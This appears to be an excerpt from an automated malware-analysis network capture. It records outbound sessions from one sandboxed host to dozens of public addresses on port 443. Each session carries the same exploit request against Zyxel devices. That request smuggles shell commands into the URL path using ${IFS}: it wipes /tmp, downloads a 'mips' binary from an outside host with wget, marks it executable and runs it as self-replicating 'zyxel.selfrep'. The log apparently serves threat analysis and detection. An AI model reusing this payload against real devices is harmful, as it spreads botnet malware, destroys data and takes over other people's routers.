                                        Mar 31, 2024 09:20:20.143723011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        457192.168.2.2347100108.134.113.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143773079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        458192.168.2.2359150167.172.82.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143815041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        459192.168.2.2334514105.86.195.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143852949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        460192.168.2.235800068.20.127.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143908978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        461192.168.2.2352066134.22.195.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.143956900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        462192.168.2.235454037.21.170.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144006968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        463192.168.2.2336474202.120.154.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144043922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        464192.168.2.2339344133.15.163.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144094944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        465192.168.2.234624814.3.38.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144153118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        466192.168.2.2345442145.73.46.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144190073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        467192.168.2.2333214141.176.37.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144248962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        468192.168.2.2336386150.66.110.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144283056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        469192.168.2.2349720123.193.163.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144324064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        470192.168.2.235553637.80.186.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144355059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        471192.168.2.2357528163.100.232.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144418001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        472192.168.2.2355666217.129.103.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144453049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        473192.168.2.2341046212.166.211.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144491911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        474192.168.2.235815036.113.227.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144553900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        475192.168.2.2333982191.83.255.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144592047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        476192.168.2.234349613.18.193.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144654989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        477192.168.2.233387012.102.90.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144685030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        478192.168.2.234704439.3.159.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144723892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        479192.168.2.234780046.52.134.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144763947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        480192.168.2.2341218217.157.113.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144818068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        481192.168.2.235858050.182.138.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144872904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        482192.168.2.233618027.104.185.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144905090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        483192.168.2.2339268131.244.177.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.144961119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        484192.168.2.235357266.235.166.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145001888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        485192.168.2.234687488.57.30.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145055056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        486192.168.2.233783253.37.13.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145113945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        487192.168.2.2344642108.226.238.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145145893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        488192.168.2.236001885.124.152.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145181894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        489192.168.2.2342572178.99.255.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145253897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        490192.168.2.233749091.150.232.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145288944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        491192.168.2.2334668190.164.149.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145333052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        492192.168.2.2345786139.192.70.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145364046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        493192.168.2.233298696.31.102.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145401001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        494192.168.2.233819835.33.156.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145452976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        495192.168.2.2355898150.136.201.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145489931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        496192.168.2.2350624149.118.16.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145539045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        497192.168.2.234525644.163.129.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145580053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        498192.168.2.2358212200.213.3.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145622969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        499192.168.2.2337012153.95.156.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145683050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        500192.168.2.2333500162.166.86.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145709991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        501192.168.2.2356910129.79.138.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145767927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        502192.168.2.234520061.232.58.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145809889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        503192.168.2.2338774108.32.169.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145868063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        504192.168.2.235414824.1.200.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145906925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        505192.168.2.233729462.10.121.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.145948887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        506192.168.2.2348950195.43.140.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146003962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        507192.168.2.234584476.202.81.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146034956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        508192.168.2.2343742125.67.17.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146090984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        509192.168.2.2338572173.168.207.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146131992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        510192.168.2.2349644144.194.86.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146168947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        511192.168.2.233903099.63.73.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146219015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        512192.168.2.234752034.191.3.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146255970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        513192.168.2.235373039.156.70.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146308899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        514192.168.2.2354326207.55.171.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146367073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        515192.168.2.234941695.225.209.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146413088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        516192.168.2.2355236105.148.57.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146461964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        517192.168.2.2350258180.17.6.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146506071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        518192.168.2.2333304108.79.59.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146538973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        519192.168.2.235985253.162.1.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146598101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        520192.168.2.235024636.140.82.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146648884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        521192.168.2.2350820222.166.176.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146694899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        522192.168.2.235174259.67.81.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146734953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        523192.168.2.235453669.174.114.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146790981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        524192.168.2.2348530210.26.247.10443
                                        TimestampBytes transferredDirectionData
